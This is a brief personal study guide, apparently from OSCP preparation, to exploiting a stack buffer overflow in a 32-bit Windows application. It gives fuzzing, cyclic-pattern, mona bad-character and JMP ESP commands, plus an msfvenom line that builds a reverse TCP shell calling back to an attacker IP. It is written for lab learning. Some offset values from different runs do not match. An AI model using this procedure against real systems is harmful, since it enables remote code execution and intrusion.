Binary Exploitation (a *very* brief overview)

Binary Exploitation⚑

During my studies to become OSCP certified I studied quite a bit but never delved too far into binary exploitation. Here are a few takeaways and things that I occasionally look back at. Mostly here's the high-level operational view. Mind you, this is for a 32bit windows app lol

Guide⚑

1. Start Immunity/app as administrator

2. Confirm connectivity from kali⚑

nc xxx.xxx.xxx.xxx port

3. Fuzz for crash (Template - Fuzzer )⚑

python3 fuzzer.py

4. Generate cyclic pattern to find exact crash⚑

[root@kali:/root]# cyclic 300
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac

5. Add pattern to "overflow" in exploit.py and repro crash⚑

6. Get offset from address in EIP and set "offset"⚑

Get address in EIP and find number of bytes to EIP:

[root@kali:/r/c/CMBOF]# cyclic -l 0x61616275
2003

7. Remove cyclic pattern from "overflow" and replace with "A" * offset⚑

offset = 634 # EIP @ 0x616A6761
overflow = b"A" * offset
eip = b"BBBB" # 

8. Replicate crash and confirm "B" in EIP⚑

9. Find Bad Characters with mona⚑

• Set working dir: !mona config -set workingfolder C:\Windows\Temp
• Create bytearray (without bad chars we know about) !mona bytearray --cpb "\x00"
• Include list chars in payload (without \x00)

badchars = [0x00] # start with null

• Repro crash with charpayload
• After the crash use mona to find the next bad char: !mona compare -f C:\Windows\Temp\bytearray.bin -a esp
• Note new bad char, add it to "badchars"
• Repeat steps until no new bad chars are reported

10. Find Jump Point using bad chars (running or crashed) - will be in "Log Data" window⚑

!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"

11. Put jmp address in "eip" var backwards (little endian)⚑

eip = b"\xfa\x11\x50\x62" # 625011AF

12. Generate shellcode without bad chars and add as "sc" var⚑

[root@kali:/r/c/t/O/OVERFLOW2]# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.4.230 LPORT=6666 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f python -v sc

13. Add shellcode⚑

14. Add NOPs and comment out "charpayload"⚑

padding = b"\x90" * 16

Links⚑

More questions?

• dostackbufferoverflowgood
• Exploit Development with PEDA and Pwntools
• Hacktober CTF Challenge
• * Pwntools *
• Rop Emporium
• Stack Based Overflows